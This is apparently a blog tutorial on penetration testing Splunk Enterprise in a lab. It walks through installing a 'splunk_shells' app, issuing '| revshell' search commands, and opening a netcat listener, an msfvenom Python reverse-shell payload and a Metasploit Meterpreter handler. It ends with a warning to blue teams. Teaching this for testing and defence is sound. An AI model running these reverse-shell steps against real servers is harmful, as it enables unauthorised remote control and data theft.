Penetration Testing with Splunk

By Justin Balroop

Splunk is a software mainly used for searching, monitoring, and examining machine-generated data, or “Big Data”, through a web-style interface in order to provide operational intelligence. Splunk performs capturing, indexing, and correlating the real-time data in a searchable container from which it can produce graphs, reports, alerts, dashboards, and visualizations. It aims to build machine-generated data available over an organization and can recognize data patterns, produce metrics, diagnose problems, and grant intelligence for business operation purposes. Splunk is a technology used for application management, security, and compliance, as well as business and web analytics. The main advantage of using Splunk is that it does not need any database to store its data, as it extensively makes use of its indexes to store the data. With the help of Splunk software, searching for a particular data in a bunch of complex data is easy. As you might know, in the log files, figuring out which configuration is currently running is challenging. To make this easier, there is a tool in Splunk software which helps the user detect the configuration file problems and see the current configurations that are being utilized.

Now to take things to another level, users can exploit Splunk using a reverse shell. This action can be used either maliciously by an attacker or by a penetration tester in order to improve their respective IT infrastructure. This can be done on a Linux platform such as Ubuntu. The same can be done on a Windows platform as well. In order to go through with this exploit, keep in mind that this is an authenticated exploit, so you must have Splunk credentials in order to use this exploit.

First, we download the latest version of Splunk Enterprise and login with my premade credentials as seen in the screenshot below.

Next, you can go to the URL of your Splunk Enterprise graphical user interface that is listed in the screenshot above.

 Once you enter your credentials, we can see the Splunk homepage. Now, we can begin the exploitation phase. In this first phase, we have discussed how to deploy Splunk onto your local machine, which in this case is Ubuntu. We can now move on to Splunk penetration testing in which we will try to exploit Splunk by creating a reverse shell of the machine.

In order to exploit Splunk, you must visit the following link and download the latest released shell: This application is designed to help with penetration testing and red teaming within IT infrastructures with Splunk deployment(s). This can allow the user to generate a reverse shell from a Splunk server in order to allow the user to interact with the server and do whatever as they please within the environment. After obtaining the contents from the GitHub repository, you are now able to upload the contents onto your Splunk server. This can be done by logging onto the Splunk GUI on a Kali Linux machine, for example, by visiting the IP address of the Ubuntu server, followed by port 8000. This machine will act as the attacker or penetration tester. This can be seen in the screenshot below.

Next, you can navigate to “Manage Apps” and install the “splunk_shells” application that was downloaded from GitHub. This can be seen in the following screenshots below.

After installing the application, you are then required to restart Splunk Enterprise. After restarting, you are then able to view the newly installed application under the “Apps” section labeled “Weaponize Splunk for Pentesting and Red Teaming”, as seen below.

Now that we have installed the application acquired from GitHub, we can execute the reverse shell. In order to do so, we can navigate to the search option in Splunk and implement the command that will define that we want a reverse shell of standard type to communicate with our machine’s IP address on the listening port. The search command would look like this: “| revshell std 1234”.

After issuing that command, we can move to our attacking Kali Linux machine. On this machine, we can initiate a “netcat” command in order to serve as a back-end tool that will allow us to scan and listen on certain ports. Believe it or not, you can transfer files directly through “netcat” or use it as a backdoor into other systems on the network. In this case, we will issue a “nc -lvp 1234” command on the Kali Linux machine. This command will establish a “listening mode” for any inbound connections and provide verbose output for the specified port number, which in this case is port 1234. When executed, this command will return the root “uid” and “gid” information. However, in order to obtain the property shell, we would need to dig deeper. This can be accomplished by using “MSFVenom”.

“MSFVenom” is a command line instance of the popular ethical hacking tool, “Metasploit” that is used to generate payloads. We will be specifically generating a Python payload for our Linux machine by using this command: “msfvenom -p cmd/unix/reverse_python lhost= lport=1234 R”. This command will upload the payload through the existing netcat session. However, for this command to be working properly, you must remember to start a new netcat listener inside a new terminal session. Once the netcat session is running, you can now issue the following command: “python -c ‘import pty;pty.spawn(“/bin/bash”)’”. This allows for the shell to be obtained.

Now that we have obtained the shell, we can now use a “Meterpreter” session in order to use a multi handler to acquire a reverse connection to the victim’s Ubuntu machine. “Meterpreter” is a “Metasploit” attack payload that provides an interactive shell in which the attacker can explore the target machine and execute any malicious code. This can also help penetration testers and security teams address any vulnerabilities on any targeted systems. The commands for initiating the “Meterpreter” session are as follows:

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload python/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost

msf exploit(multi/handler) > set lport 9999

msf exploit(multi/handler) > exploit-j

The results of this command will display the out “Started reverse TCP handler on”. Now, you can type the following in the Splunk search bar: “| revshell msf 9999”. This will result in a Meterpreter session successfully opening, allowing the attacker to do as they please.

            In this project, we can see how this type of attack can be very dangerous when it comes to using powerful tools such as Splunk. Having such a useful defense tool like Splunk can be very beneficial for organizations, but when fallen into the wrong hands, this can be very detrimental to companies’ blue teams. As I have stated before, once the attacker has gone through with this attack, they can do whatever they please. The actions that can be performed after weaponizing Splunk can include, but not limited to, reviewing server logs, local file access, extracting user and/more machine data, executing malicious commands, and even taking down the respective network. That is why it is important for security specialists, especially blue teams, to be aware of such attacks in order to better protect their respective IT infrastructure.



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s